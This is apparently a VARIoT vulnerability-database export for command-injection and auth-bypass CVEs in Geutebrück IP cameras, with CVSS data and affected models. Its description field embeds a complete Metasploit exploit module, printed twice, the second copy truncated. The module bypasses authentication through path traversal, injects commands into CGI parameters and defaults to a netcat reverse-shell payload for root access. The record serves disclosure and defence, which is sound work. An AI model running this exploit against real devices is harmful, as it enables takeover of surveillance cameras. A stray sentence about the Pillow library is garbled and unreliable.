            "date": "2023-11-07T03:35:51.757000",
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0848

    Vulnerability from variot - Updated: 2025-01-30 21:38

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0848",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33552",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33552",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33552",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33552",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33552",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2085",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            